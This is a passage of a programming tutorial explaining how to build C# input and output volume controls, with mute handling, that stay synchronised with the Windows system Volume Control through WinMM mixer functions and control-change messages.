Line 3: The second tag in an XHTML document must include the opening <html> tag with the XML namespace identified by the
xmlns= attribute. The XML namespace identifies the range of tags used by the XHTML document. It is used to ensure that names used by one DTD don't conflict with user-defined tags or tags defined in other DTDs.
Line 4: XHTML documents must include a full header area. This area contains the opening
<head> tag and the title tags (
<title></title>), and is then completed with the closing
</head> tag.
Line 5: XHTML documents must include opening and closing
<body></body> tags. Within these tags you can place your traditional HTML coding tags. To be XHTML conformant, the coding of these tags must be well-formed.
Line 6: Finally, the XHTML document is completed with the closing
</html> tag.
Use this with CSS when you want really clean markup, free of presentational clutter. Several tags have been removed from the language (like
<center>), and even some attributes of other tags have been removed too (like the
align attribute of the H1 tag).
Use this when you need to take advantage of HTML's presentation features; many of your readers don't have the latest browsers that understand CSS. The transitional DTD supports most of the standard HTML 4 tags and attributes.
This enables you to use HTML frames to partition the browser window into two or more frames. This DTD holds the frameset definitions..
XHTML Basic to replace CHTML and WML
A fundamental problem for developers who want to create mobile versions of their Web sites is that they currently have to format their pages in HTML for desktop browsing, in Wireless Markup Language (WML) for WAP devices, and in Compact HTML (CHTML) for iMode devices. This has led to a new industry devoted to converting existing Web sites into WML or CHTML. WML is based on XML, and replaces the near-obsolete Handheld Device Markup Language (HDML), while CHTML is based on HTML. Although these markup languages are similar, the differences between them prevent a Web page from being viewable by both WAP and iMode devices. XHTML Basic will be understood by all devices and will be a universal markup language.
The complete XHTML Basic specification (see Resources) is available in English in several formats, including HTML, plain text, PostScript, and PDF. You can expect an inevitable push to replace languages like HDML and WML with XHTML Basic. However, it's important to remember that WML and HDML also define actions as well as content. These currently have no equivalent in XHTML. So, in the short term at least, WML and HDML aren't going to disappear. It will be interesting to see who wins out in the end. Plan on supporting all three markup languages at some point.
One aspect of XHTML that's still under construction is device profiling, also known as Composite Capability Preference Profiles (CCPP). CCPP allows a device such as a cell phone to identify itself to a Web server, describe its limitations, and download only the information that it's capable of displaying. CCPP works because XHTML documents can be split into modules that can be downloaded separately.
The W3C is working on CCPP in collaboration with the WAP Forum, among others. In the summer of 2001, work began on XHTML 2.0, the final step on the bridge between HTML and XML. XHTML 2.0 is forward-looking with its incorporation of XML technologies such as XLink, XPointer, XPath, and XInclude -- all of which are currently in development or recently released by the W3C (see the roadmap in Resources).
XHTML breaks new ground on the Web, giving authors a way to mix and match various XML-based languages and documents on their Web pages. It also provides a framework for nontraditional Web access devices -- from toasters to television sets -- to identify themselves and their capabilities to Web servers, pulling down only information that those devices can display. Thanks to XHTML, you can continue writing in the HTML you've come to know and love. You may just need to clean it up a bit. My guess is that XHTML 2.0 (see Resources) will specifically clean up HTML tags and their usage.
In conclusion, XHTML makes it easy to create documents that can be seen by all kinds of new devices. Additionally, with a little studying, you can create much more powerful pages than ever before. Lastly, XHTML is the bridge to XML -- the future language of the Internet.
- Review the W3C XHTML 1.0 specification, which defines a reformulation of HTML 4 as an XML 1.0 application, and three DTDs corresponding to the ones defined by HTML 4.
- Read an introduction and overview of XHTML that includes an explanation of the differences between XHMTL and HTML 4.
- Find out more about XHTML Basic.
- Look at HTML Working Group Roadmap, which lays out a clear picture of future development in XHTML, including information on XHTML 2.0.
- View Encyclozine.com, an example of a site built in XHTML.
- To validate an XHTML page, try the W3C HTML Validation Service.
- Find more XML resources on the developerWorks XML technology zone.
- Find more Web resources in the developerWorks.
Sathyan Munirathinam holds a Bachelor of Science in Computer Science and Master of Computer Applications from Madurai Kamaraj University. He has more than two years experience in information technology working as a software engineer at Aztec Software. His professional interests are in database systems and networking, and his personal interests are reading technical journals, hacking network systems, and playing cricket. You can reach him at sat_hyan@yahoo.com. | http://www.ibm.com/developerworks/web/library/x-xhtml/index.html | crawl-003 | refinedweb | 1,297 | 62.58 |
How to convert C++ code to C.
Write a program in C that asks a user for the name of a file. The program should display the first 10 lines of the file on the screen (the "head" of the file). If the file has fewer than 10 lines, the entire file should be displayed, with a message indicating the entire file has been displayed.
\//Run the program using visual studio 2010 vc++ /** *This program ask the user to enter the name of the text file *and displays the ten lines of the file and if the file having less than 10 line than *display the output that the total file has been displayed */ //Header files #include<iostream> #include<fstream> #include<string> using namespace std; //start of main funtion int main() { //variable declaration string filename; char ch; //char line[80]; //create file stream object to the class fstream fstream fin; //ask for file name cout<<"Enter a filename"< cin>>filename; //open that file in read mode fin.open(filename,ios::in); //check the file is opened successfully if(!fin) { cout<<"Error while opening file "< } else { int counter=0; //checking for end of the file while((ch=fin.get())!=EOF && counter<=10 ) { //getline funtion to take one line at a time if(ch=='\n' ) { counter++; } //display to the screen cout< } //display the message if number of lines are less than ten if(counter<10) { cout<<<"------------------------------"< cout<<"ENTIRE FILE HAS BEEN DISPLAYED"< } } //to pause the output system("pause"); return 0; } //end of main function
Please help. Thanks. | https://www.daniweb.com/programming/software-development/threads/451626/file-reading | CC-MAIN-2021-17 | refinedweb | 255 | 67.52 |
DNS organizes hostnames in a domain hierarchy. A domain is a collection of sites that are related in some sense—because they form a proper network (e.g., all machines on a campus, or all hosts on BITNET), because they all belong to a certain organization (e.g., the U.S. government), or because they're simply geographically close. For instance, universities are commonly grouped in the edu domain, with each university or college using a separate subdomain, below which their hosts are subsumed. Groucho Marx University have the groucho.edu domain, while the LAN of the Mathematics department is assigned.
Figure 6-1 shows a section of the namespace. The entry at the root of this tree, which is denoted by a single dot, is quite appropriately called the root domain and encompasses all other domains. To indicate that a hostname is a fully qualified domain name, rather than a name relative to some (implicit) local domain, it is sometimes written with a trailing dot. This dot signifies that the name's last component is the root domain.
Depending on its location in the name hierarchy, a domain may be called top-level, second-level, or third-level. More levels of subdivision occur, but they are rare. This list details several top-level domains you may see frequently:
Historically, the first four of these were assigned to the U.S., but recent changes in policy have meant that these domains, named global Top Level Domains (gTLD), are now considered global in nature. Negotiations are currently underway to broaden the range of gTLDs, which may result in increased choice in the future.
Outside the U.S., each country generally uses a top-level domain of its own named after the two-letter country code defined in ISO-3166. Finland, for instance, uses the fi domain; fr is used by France, de by Germany, and au by Australia. Below this top-level domain, each country's NIC is free to organize hostnames in whatever way they want. Australia has second-level domains similar to the international top-level domains, named com.au and edu.au. Other countries, like Germany, don't use this extra level, but have slightly long names that refer directly to the organizations running a particular domain. It's not uncommon to see hostnames like. Chalk that up to German efficiency.
Of course, these national domains do not imply that a host below that domain is actually located in that country; it means only that the host has been registered with that country's NIC. A Swedish manufacturer might have a branch in Australia and still have all its hosts registered with the se top-level domain.
Organizing the namespace in a hierarchy of domain names nicely solves the problem of name uniqueness; with DNS, a hostname has to be unique only within its domain to give it a name different from all other hosts worldwide. Furthermore, fully qualified names are easy to remember. Taken by themselves, these are already very good reasons to split up a large domain into several subdomains.
DNS does even more for you than this. It also allows you to delegate authority over a subdomain to its administrators. For example, the maintainers at the Groucho Computing Center might create a subdomain for each department; we already encountered the math and physics subdomains above. When they find the network at the Physics department too large and chaotic to manage from outside (after all, physicists are known to be an unruly bunch of people), they may simply pass control of the physics.groucho.edu domain to the administrators of this network. These administrators are free to use whatever hostnames they like and assign them IP addresses from their network in whatever fashion they desire, without outside interference.
To this end, the namespace is split up into zones, each rooted at a domain. Note the subtle difference between a zone and a domain: the domain groucho.edu encompasses all hosts at Groucho Marx University, while the zone groucho.edu includes only the hosts that are managed by the Computing Center directly; those at the Mathematics department, for example. The hosts at the Physics department belong to a different zone, namely physics.groucho.edu. In Figure 6-1, the start of a zone is marked by a small circle to the right of the domain name.
At first glance, all this domain and zone fuss seems to make name resolution an awfully complicated business. After all, if no central authority controls what names are assigned to which hosts, how is a humble application supposed to know?
Now comes the really ingenious part about DNS. If you want to find the IP address of erdos, DNS says, “Go ask the people who manage it, and they will tell you.”
In fact, DNS is a giant distributed database. It is implemented by so-called name servers that supply information on a given domain or set of domains. For each zone there are at least two, or at most a few, name servers that hold all authoritative information on hosts in that zone. To obtain the IP address of erdos, all you have to do is contact the name server for the groucho.edu zone, which will then return the desired data.
Easier said than done, you might think. So how do I know how to reach the name server at Groucho Marx University? In case your computer isn't equipped with an address-resolving oracle, DNS provides for this, too. When your application wants to look up information on erdos, it contacts a local name server, which conducts a so-called iterative query for it. It starts off by sending a query to a name server for the root domain, asking for the address of erdos.maths.groucho.edu. The root name server recognizes that this name does not belong to its zone of authority, but rather to one below the edu domain. Thus, it tells you to contact an edu zone name server for more information and encloses a list of all edu name servers along with their addresses. Your local name server will then go on and query one of those, for instance, a.isi.edu. In a manner similar to the root name server, a.isi.edu knows that the groucho.edu people run a zone of their own, and points you to their servers. The local name server will then present its query for erdos to one of these, which will finally recognize the name as belonging to its zone, and return the corresponding IP address.
This looks like a lot of traffic being generated for looking up a measly IP address, but it's really only miniscule compared to the amount of data that would have to be transferred if we were still stuck with HOSTS.TXT. There's still room for improvement with this scheme, however.
To improve response time during future queries, the name server stores the information obtained in its local cache. So the next time anyone on your local network wants to look up the address of a host in the groucho.edu domain, your name server will go directly to the groucho.edu name server.[1]
Of course, the name server will not keep this information forever; it will discard it after some time. The expiration interval is called the time to live, or TTL. Each datum in the DNS database is assigned such a TTL by administrators of the responsible zone.
Name servers that hold all information on hosts within a zone are called authoritative for this zone, and sometimes are referred to as master name servers. Any query for a host within this zone will end up at one of these master name servers.
Master servers must be fairly well synchronized. Thus, the zone's network administrator must make one the primary server, which loads its zone information from data files, and make the others secondary servers, which transfer the zone data from the primary server at regular intervals.
Having several name servers distributes workload; it also provides backup. When one name server machine fails in a benign way, like crashing or losing its network connection, all queries will fall back to the other servers. Of course, this scheme doesn't protect you from server malfunctions that produce wrong replies to all DNS requests, such as from software bugs in the server program itself.
You can also run a name server that is not authoritative for any domain.[2] This is useful, as the name server will still be able to conduct DNS queries for the applications running on the local network and cache the information. Hence it is called a caching-only server.
We have seen that DNS not only deals with IP addresses of hosts, but also exchanges information on name servers. DNS databases may have, in fact, many different types of entries.
A single piece of information from the DNS database is called a resource record (RR). Each record has a type associated with it describing the sort of data it represents, and a class specifying the type of network it applies to. The latter accommodates the needs of different addressing schemes, like IP addresses (the IN class), Hesiod addresses (used by MIT's Kerberos system), and a few more. The prototypical resource record type is the A record, which associates a fully qualified domain name with an IP address.
A host may be known by more than one name. For example you might have a server that provides both FTP and World Wide Web servers, which you give two names: and. However, one of these names must be identified as the official or canonical hostname, while the others are simply aliases referring to the official hostname. The difference is that the canonical hostname is the one with an associated A record, while the others only have a record of type CNAME that points to the canonical hostname.
We will not go through all record types here, but we will give you a brief example. Example 6-4 shows a part of the domain database that is loaded into the name servers for the physics.groucho.edu zone.
Apart from the A and CNAME records, you can see a special record at the top of the file, stretching several lines. This is the SOA resource record signaling the Start of Authority, which holds general information on the zone the server is authoritative for. The SOA record comprises, for instance, the default time to live for all records.
Note that all names in the sample file that do not end with a dot should be interpreted relative to the physics.groucho.edu domain. The special name (@) used in the SOA record refers to the domain name by itself.
We have seen earlier that associates an address with that name. Since these records are what holds the namespace together, they are frequently called glue records. They are the only instances of records in which a parent zone actually holds information on hosts in the subordinate zone. The glue records pointing to the name servers for physics.groucho.edu are shown in Example 6-5.
Finding the IP address belonging to a host is certainly the most common use for the Domain Name System, but sometimes you'll want to find the canonical hostname corresponding to an address. Finding this hostname is called reverse mapping, and is used by several network services to verify a client's identity. When using a single hosts file, reverse lookups simply involve searching the file for a host that owns the IP address in question. With DNS, an exhaustive search of the namespace is out of the question. Instead, a special domain, in-addr.arpa, has been created that contains the IP addresses of all hosts in a reversed dotted quad notation. For instance, an IP address of 149.76.12.4 corresponds to the name 4.12.76.149.in-addr.arpa. The resource-record type linking these names to their canonical hostnames is PTR.
Creating a zone of authority usually means that its administrators have full control over how they assign addresses to names. Since they usually have one or more IP networks or subnets at their hands, there's a one-to-many mapping between DNS zones and IP networks. The Physics department, for instance, comprises the subnets 149.76.8.0, 149.76.12.0, and 149.76.14.0.
Consequently, new zones in the in-addr.arpa domain have to be created along with the physics zone, and delegated to the network administrators at the department: 8.76.149.in-addr.arpa, 12.76.149.in-addr.arpa, and 14.76.149.in-addr.arpa. Otherwise, installing a new host at the Collider Lab would require them to contact their parent domain to have the new address entered into their in-addr.arpa zone file.
The zone database for subnet 12 is shown in Example 6-6. The corresponding glue records in the database of their parent zone are shown in Example 6-7.
in-addr.arpa system zones can only be created as supersets of IP networks. An even more severe restriction is that these networks' netmasks have to be on byte boundaries. All subnets at Groucho Marx University have a netmask of 255.255.255.0, hence an in-addr.arpa zone could be created for each subnet. However, if the netmask were 255.255.255.128 instead, creating zones for the subnet 149.76.12.128 would be impossible, because there's no way to tell DNS that the 12.76.149.in-addr.arpa domain has been split into two zones of authority, with hostnames ranging from 1 through 127, and 128 through 255, respectively. | http://www.makelinux.net/books/nag2/x-087-2-resolv.howdnsworks | CC-MAIN-2014-42 | refinedweb | 2,303 | 63.39 |
First Look: ADO.NET and InterSystems Products
This First Look guide explains how to connect to InterSystems IRIS® data platform via the InterSystems ADO.NET Managed Provider. Once you have completed this guide, you will have configured a Visual Studio project to use the InterSystems.Data.IRISClient.dll assembly, established an ADO.NET connection to InterSystems IRIS, run several SQL statements from your .NET application, and confirmed the effects of these statements in the InterSystems IRIS System Management Portal.
To give you a taste of the ADO.NET Managed Provider without bogging you down in details, we’ve kept this exploration simple. These activities are designed to only use the default settings and features, so that you can acquaint yourself with the fundamentals of the feature without having to deal with details that are off-topic or overly complicated. When you bring ADO.NET to your production systems, there may be things you will need to do differently. Be sure not to confuse this exploration of ADO.NET with the real thing! The sources provided at the end of this document will give you a good idea of what is involved in using ADO.NET in production.
For more documentation on ADO.NET, see Learn More About ADO.NET.
To browse all of the First Looks, including those that can be performed on a free evaluation instance of InterSystems IRIS
, see InterSystems First Looks
.
Why ADO.NET Is Important
ADO.NET is a data access technology from the Microsoft .NET Framework that provides access to data sources. It is used to establish database connectivity and provides a standard, reliable way for .NET Framework programmers to connect to many types of data sources or perform operations on them with SQL. Connecting to InterSystems IRIS via the ADO.NET Managed Provider is simple, especially if you’ve used ADO.NET before. Establishing an ADO.NET connection to InterSystems IRIS from a .NET application allows you to run SQL commands against InterSystems IRIS databases from your .NET application.
If you’re new to InterSystems IRIS but familiar with .NET and SQL, you can use your existing expertise right away to help you become familiar with the database platform. You can test ADO.NET connections and SQL commands in a development environment with just a few lines of code.
ADO.NET and InterSystems IRIS
InterSystems IRIS is a fully compliant implementation of the ADO.NET specification. The InterSystems ADO.NET Managed Provider provides easy relational access to data. It processes ADO.NET method calls from applications and submits SQL requests to InterSystems IRIS. It then returns results to the calling application — in this case, your .NET application.
Connecting to InterSystems IRIS via ADO.NET is a very straightforward process.
In order to use InterSystems IRIS ADO.NET capability, you must first add the InterSystems.Data.IRISClient.dll assembly as a dependency to your Visual Studio project. After confirming a few settings, use our sample code to establish an ADO.NET connection to InterSystems IRIS and to execute SQL queries. Note that the InterSystems.Data.IRISClient.dll assembly is implemented using .NET managed code throughout, making it easy to deploy within a .NET environment. It is thread-safe and can be used within multithreaded .NET applications.
Exploring ADO.NET
We have developed a brief demo that shows you how to work with ADO.NET and InterSystems IRIS. (Want to try an online video-based demo of InterSystems IRIS .NET development and interoperability features? Check out the .NET QuickStart
!)
Before you Begin
To use
In the Visual Studio main menu, create a new Project by selecting File > New > Project. In the resulting dialog, click the Visual C# option, and choose Console App (.NET Framework). For the Name field, enter ADONET. Click OK. This should create a new console application using the .NET Framework.
Next, in the Visual Studio main menu, select Project > ADONET Properties. Under Target framework, select .NET Framework 4.5.
Adding the Assembly Reference
The InterSystems.Data.IRISClient.dll assembly must be installed on your local system. You can obtain it by cloning the repo
or downloading the file from that repo. If InterSystems IRIS is installed on your local system or another you have access to, the assembly is already installed in the subdirectory install-dir\dev\dotnet\bin\v4.5, where install-dir is the installation directory for the instance.
To add an assembly reference to InterSystems.Data.IRISClient.dll to a project:
From the Visual Studio main menu, select Project > Add Reference...
In the resulting window, click Browse....
Browse to the location of the InterSystems.Data.IRISClient.dll file.
Select the file and click Add.
Click OK.
In the Visual Studio Solution Explorer, the InterSystems.Data.IRISClient.dll assembly should now be listed under References.
Connecting via ADO.NET
At this point, you are ready to connect to InterSystems IRIS from your .NET application. The connection string for the InterSystems ADO.NET Managed Provider is made up of key/value pairs that define the connection properties. The connection string syntax is:
Server=host_IP; Port=superserverPort; Namespace=namespace; Password=password; User ID=username;
where the variables represent the InterSystems IRIS instance host’s IP address, the instance’s superserver port, a namespace on the instance, and credentials for the instance. This is the same information you used to connect Visual Studio to your instance, as described in Before You Begin.
Update this information in the code that follows after you paste it into Visual Studio. You can set namespace to the predefined namespace USER, as shown, or to another namespace you have created on your installed instance.
using System; using InterSystems.Data.IRISClient; namespace ADONET { class Program { static void Main(string[] args) { String host = "<host>"; String port = "<port>"; String username = "<username>"; String password = "<password>"; String Namespace = "USER"; IRISConnection IRISConnect = new IRISConnection(); IRISConnect.ConnectionString = "Server = " + host + "; Port = " + port + "; Namespace = " + Namespace + "; Password = " + password + "; User ID = " + username; IRISConnect.Open(); String sqlStatement1 = "CREATE TABLE People(ID int, FirstName varchar(255), LastName varchar(255))"; String sqlStatement2 = "INSERT INTO People VALUES (1, 'John', 'Smith')"; String sqlStatement3 = "INSERT INTO People VALUES (2, 'Jane', 'Doe')"; String queryString = "SELECT * FROM People"; IRISCommand cmd1 = new IRISCommand(sqlStatement1, IRISConnect); IRISCommand cmd2 = new IRISCommand(sqlStatement2, IRISConnect); IRISCommand cmd3 = new IRISCommand(sqlStatement3, IRISConnect); IRISCommand cmd4 = new IRISCommand(queryString, IRISConnect); //ExecuteNonQuery() is used for CREATE, INSERT, UPDATE, and DELETE SQL Statements cmd1.ExecuteNonQuery(); cmd2.ExecuteNonQuery(); cmd3.ExecuteNonQuery(); //ExecuteReader() is used for SELECT IRISDataReader Reader = cmd4.ExecuteReader(); Console.WriteLine("Printing out contents of SELECT query: "); while (Reader.Read()) { Console.WriteLine(Reader.GetValue(0).ToString() + ", " + Reader.GetValue(1).ToString() + ", " \ + Reader.GetValue(2).ToString()); } Reader.Close(); cmd1.Dispose(); cmd2.Dispose(); cmd3.Dispose(); cmd4.Dispose(); IRISConnect.Close(); Console.WriteLine("Press any key to continue..."); Console.ReadKey(); } } }
Run the code by clicking the Start button, or by pressing F5.
If the connection and queries have completed successfully, you should see a console window containing the results of the SELECT query. (click Switch next to the Namespace: indicator at the top of the page).
Navigate to the SQL page (System Explorer > SQL), then click the Execute Query tab and paste in the following SQL query:
SELECT ID, FirstName, LastName FROM SQLUser.People
Click Execute. The page should display the contents of the People table created in the sample code.
Learn More About ADO.NET
To learn more about ADO.NET, SQL, and InterSystems IRIS, see:
Using the InterSystems Managed Provider for .NET | https://docs.intersystems.com/healthconnectlatest/csp/docbook/stubcanonicalbaseurl/csp/docbook/DocBook.UI.Page.cls?KEY=AFL_adonet | CC-MAIN-2021-49 | refinedweb | 1,230 | 51.44 |
Question:
How do I get my data struc program to enter input about 12 players. I just can not seem to get it. My code below only enters one player. I think I understand the concept but can't seem to make it work.
// Write a prg that stores info. about a soccer player in a struc.
// The program should keep an array of 12 of these structures.
// Each element is for a different player on a team.
// When the program runs it should ask the user to enter the info for
// each player. It should the show a table that lists eahc player's
// number, name, and points scored.
// The program should also calculate and display the total points
// earned by the team.
// The number and name of player that has earned the most points should also
// be displayed.
// My current program only does one person. How do I make the array loop
//through each element for all 12 players.
#include <stdio.h>
#include <iostream.h>
struct player
{
char name[35];
int no;
int point;
};
// struct player soccer[12]; My array to enter 12 players
// int i;
// for (i=0, i<12; i++) My loop to enter 12 player info.
void getData(player *);
void main(void)
{
player soccer;
cout<<"Enter player data:\n";
getData(&soccer);
cout <<"\n This is what you entered:\n";
cout.precision(2);
// now display the data scored in soccer
cout<<"Name: " << soccer.name <<endl;
cout <<"Number: "<< soccer.no <<endl;
cout <<"Point: " << soccer.point << endl;
}
// Def of function getData useds a pointer to a player stucture
// variable. The user enters into, which is stored in the variable
void getData(player *p)
{
cout << "Player's name: ";
cin.getline(p->name, 35);
cout <<"Player's number: ";
cin.ignore (); //ignore the leftover new line.
cin>>p->no;
cout <<"Points scored by player: ";
cin>>p->point;
} | https://cboard.cprogramming.com/cplusplus-programming/11203-cplusplus-data-struct-using-array-input.html | CC-MAIN-2018-05 | refinedweb | 306 | 77.23 |
This is a story of two dogs. (And it has a point, so stay with me.) Kipper is the name of one dog. He is a miniature dachshund that I got through a rescue organization when he was a year old. My other dog, Packer (Go Green Bay!), is a beautiful and regal white German Shepherd.
You should know that Kipper is crazy. He is a short-legged, log-shaped bundle of neuroses the likes of which you've never seen. He barks when people leave the house, he goes crazy at doorbells (both live and on TV), and he loses his ever-lovin' mind in a moving car. At the park, he picks fights with Rottweilers and at home he snacks from the litter box (the latter I think qualifies as a crime against humanity.)
Now Packer, on the other hand, is ruffled by nothing. I show that dog how to do something once and he's got it. He's a stoic, Rin Tin Tin-ish dream dog. Dependable, protective, and asks nothing in return (mainly because he can't talk, but you know what I mean).
You can guess which one, out of necessity, garners most of my attention. Yep, the one with all the problems; the squeaky wheel (or, in this case, the pip-squeaky wheel). It's an unconscious thing. It's not favoritism, it's just a matter of my attention being taken up by problems that happen to be continuously caused by the same entity.
I'm using a dumb example to make a point. My point is that this phenomenon can also happen in families, where one child needs more attention due to bad behavior or ill health. And it can also happen at work. (Note: I'm not comparing your staff members to animals, I'm merely discussing a psychological phenomenon.)
If you're a manager dealing with a poor performer who you are trying to get on the right track, you can easily start to take your good employees for granted. The good news is that your good employees have their own personal standards and probably don't need feedback to keep doing their jobs well. The bad news is that's no excuse. It's still your job to nurture and encourage good traits like productivity and dependability, just as much as it's your job to correct the bad ones. At some point, and better sooner than later, you're going to have to step back and take a look at how the problematic employee is affecting the morale of the rest of the team. If the problems can be fixed, then by all means fix them. But take time every now and then to acknowledge the good stuff that's happening, and the good work that allows you to step away and focus on the problems.
Full Bio
Toni Bowers is Managing Editor of TechRepublic and is the award-winning blogger of the Career Management blog. She has edited newsletters, books, and web sites pertaining to software, IT career, and IT management issues. | http://www.techrepublic.com/blog/career-management/me-two-dogs-and-a-litter-box/ | CC-MAIN-2017-22 | refinedweb | 516 | 72.26 |
In a forthcoming article I will be describing a DirectSound based Wave Player-Recorder, with some unusual features.
The GUI will include a simple volume control for playback. Since I wanted that control to be synchronized with the system Volume Control utility, I needed to use WinMM.DLL functions and I thought this interim article outlining how those functions are used, and showing in particular how such a control can be synchronized with the system Volume Control, might be of general interest.
I will show two controls – a sound card input volume control (Line in) and an output volume control (Speakers). From a programming point of view they are treated identically, so where I speak of 'the control' you should understand that what I say applies equally to both input and output controls.
Everything here is directly relevant to other fader controls such as bass, treble, independent left and right channel controls, and so on – including external capture devices such as the microphone in your webcam.
You will also see how to mute/unmute those controls (if they are able to be muted) without disturbing settings, as you can see in this screen shot:
Synchronization requires that changes to a volume control are accurately reflected in the system Volume Control, and vice versa. Likewise with muting and un-muting of lines.
The controls are quasi-logarithmic (as are those in the system utility) meaning successive volume steps up and down follow what is a rough approximation to a logarithmic law. This is necessary because of the way we perceive changes in sound level. It is desirable that each step represent a just noticeable increase (or decrease) in level and that is the way the controls shown here function. And indeed this is the way your keyboard buttons are designed to operate.
You might like to perform the following experiment with your sound card. Launch both the demo application and the system Volume Control utility.
Now reduce the speaker volume on your sound card to zero (not by muting, but by dragging the slider on the Speakers control to its minimum position) and then, using the increase volume button on your keyboard, step through the full span of the control, noting volume levels on the demo screen as you go.
You should find that there are 25 steps and that they are very close to the values in the array shown in the source, which is derived from my own keyboard:
int[] volSteps = { 0, 2621, 5242, 7863,
10484, 13105, 15726, 18347,
20968, 23589, 26210, 28831,
31452, 34073, 36694, 39315,
41936, 44557, 47178, 49799,
52420, 55041, 57662, 60283,
62904, 65535 };
While this is happening you will see the demo Speakers control and the system Speakers control moving in sync. When you are done, move the line and speaker sliders in the system Volume Control and you will see the demo controls follow.
The +/- buttons alongside the demo Speakers control, when clicked, will match the pressing of the up and down buttons on your keyboard, delivering a just noticeable increase or decrease in volume. The steps will correspond to the volSteps array values (the least significant digit will wander). You can otherwise click anywhere on the scale to change volume and you will be taken to a volume level corresponding to where you clicked the scale. The system control will at all times reflect these changes.
volSteps
Behind the demo screen lies a fairly complex piece of code, or so it will seem to readers who have not had dealings with these WinMM functions before. Well, maybe also to some who have.
I chose these two particular controls – the Line in input and the Speakers output – because they happen to correspond to my desk, where I listen to the radio through my sound card, with the radio’s low impedance output connected to Line in. It has therefore always been easy to test the code as it developed. In exercising this code, you are able to substitute or add in any other controls which suit your purpose.
To make things easier to follow, I will illustrate here just the Line in control. Everything I say about that control applies equally to the Speakers control.
The graphics are extremely simple. The scale is just an ASCII label and the bar a thin rectangle. The non-linear appearance of the scale is intended to do no more than suggest a logarithmic scale – it should not be thought to be based on anything mathematical.
As already mentioned, volume levels are changed, not by dragging a pointer, but by clicking anywhere on the scale. You can otherwise click the up or down buttons and each click will change the level by one step.
Changes in volume level, initiated either via the demo screen or the system Volume Control, lead to the new level ( 0 .. 65535 ) appearing in the control’s adjacent text box. I also show the mute status of the control as a Mute Volume, which will always be 0 or 1. Zero corresponds to un-muted and the Mute volume level will, of course, follow checking or un-checking of the Mute check box.
Some writers mute a control by reducing the volume slider to zero but this is neither appropriate nor in any way necessary.
The mute status of a control can be set and read in exactly the same way as the line volume can be set and read.
Because I rarely have use for dynamic graphics, I had forgotten that care needs to be taken to ensure those graphics are included whenever a form is repainted, for example when a form is restored after being minimized. You can otherwise be left wondering where your graphics have gone!
Unless you have a preferred way of achieving this, the following overridden OnPaint arrangement should be adhered to:
OnPaint
protected override void OnPaint( PaintEventArgs e )
{
base.OnPaint(e);
}
private void scaleLine_Paint(object sender, PaintEventArgs e)
{
Graphics gLine = e.Graphics;
gLine.FillRectangle(brushBlue, rectX, rectY, rectWLine, rectH);
}
private void Form1_Load( object sender, EventArgs e )
{
//
scaleLine.Paint += new PaintEventHandler(this.scaleLine_Paint);
//
}
Updating the bar requires the existing bar to be erased before the new bar is painted and to this end I have an eraseBrush whose color is the same as the form’s BackColor. When a volume level changes, the following code translates the new volume level to a filled rectangle:
rectW = (int)((newVol / 65535.0) * rectWMax + 1);
gLine.FillRectangle(brushErase, rectX, rectY, rectWMax + 1, rectH);
gLine.FillRectangle(brushBlue, rectX, rectY, rectW, rectH);
That is all that is needed to look after the graphics. Every time the form is repainted, for whatever reason, the bar, which might otherwise be lost, will be repainted. Because the control would look quite odd at zero volume (i.e. no bar) I arrange for the bar to remain just visible for a zero or near-zero volume level.
The MM class contains everything we need to interact with the controls.
I have included in the MM class only those constants and imports which are needed for this demo, to make things easier to follow. There is otherwise a bewildering array of constants and functions to weave your way through, some used, most not. A more formal presentation would include what I have left out and I will include references to where to go to flesh out the class, if you feel the need to do that.
The class enables us to get and set volume levels, and to get and set mute status, which is pretty well an identical operation, and of course to ensure that we have access to the mixer which holds our controls. Once it is clear which parameters are to be passed, and how they are to be passed to the WinMM functions, the rest is easy enough.
You will note that I am dealing with the default mixer only. If you want to have access to other mixers (sound cards) in your system, you may easily do so, though I would point out that DirectSound is rather easier to use and more intuitive for purposes other than the synchronization task dealt with here. Mixers are indexed from zero and the default mixer has a DeviceID of zero.
Some thought is required as to how to synch a control to its counterpart in the system utility, because there is more than one way to achieve this. I use the MM_MIXM_CONTROL_CHANGE ( = 0x3D1 ) message which signals that a control has changed, including any change in a line’s mute status.
MM_MIXM_CONTROL_CHANGE
On recognition of this message we can either update all controls or, better, as is done here, just the control which has changed. The LParam of the message is the control’s unique ID (dwControlID, a member of the MIXERCONTROL structure). During initialization this structure is referenced for each control in turn, so that when processing the message we will know where it came from and be able to update just the one control, with very little overhead.
LParam
dwControlID
MIXERCONTROL
To enable the message to be intercepted we need to create a window to which the message can be directed and tested. The NativeWindow sub-class offers a neat solution and its use is well documented. Whenever the message MM_MIXM_CONTROL_CHANGE is detected, updates are posted to the screen.
NativeWindow
SubclassHWND is taken straight from MSDN:
SubclassHWND
using System.Windows.Forms;
namespace SynchronizedVolumeControl
{
public class SubclassHWND : NativeWindow
{
protected override void WndProc( ref Message m )
{
base.WndProc( ref m );
}
}
}
The window which will intercept the MM_MIXM_CONTROL_CHANGE message is declared during Form1_Load:
// Set up a window to receive MM_MIXM_CONTROL_CHANGE messages ...
SubclassHWND w = new SubclassHWND();
w.AssignHandle(this.Handle);
int iw = (int)this.Handle; // Note that the window's handle needs to be cast as
// an integer before it can be used
// ... and we can now activate the message monitor
bool b = MM.MonitorControl( iw );
... and so the monitoring has begun.
Here is the MonitorControl function:
public static bool MonitorControl( int iw ) // iw is the window handle
{
int rc = -1;
bool retValue = false;
int hmixer;
rc = mixerOpen(
out hmixer,
0,
iw,
0,
CALLBACK_WINDOW);
return retValue = (MMSYSERR_NOERROR == rc) ? true : false;
}
Detection of an MM_MIXM_CONTROL_CHANGE message triggers the following code which updates graphics and check boxes and therefore keeps the demo controls and their system counterparts synchronized:
protected override void WndProc( ref Message m )
{
if (m.Msg == MM.MM_MIXM_CONTROL_CHANGE) // Code 0x3D1 indicates a control change
{
int i = (int)(m.LParam);
// We can't use switch so we must do it this way:
bool b1 = i == lineVolumeControlID ? true : false;
bool b2 = i == lineMuteControlID ? true : false;
//
if (b1)
{
// Line volume update LINE VOLUME
int v = MM.GetVolume(lineVolumeControl, lineComponent);
tbVolLine.Text = v.ToString();
rectWLine = (int)((v / 65535.0) * rectWMax) + 1;
// This will prevent the volume bar from disappearing at near zero levels
rectWLine = rectWLine < 4 ? 4 : rectWLine;
gLine.FillRectangle(brushErase, rectX, rectY, rectWMax + 1, rectH);
gLine.FillRectangle(brushBlue, rectX, rectY, rectWLine, rectH);
}
if (b2)
{
// Line mute update LINE MUTE
int muteStatus = MM.GetVolume(lineMuteControl, lineComponent);
cbLine.Checked = muteStatus > 0 ? true : false;
tbMuteLine.Text = muteStatus.ToString();
}
//
}
// The intercepted message, with all other messages is
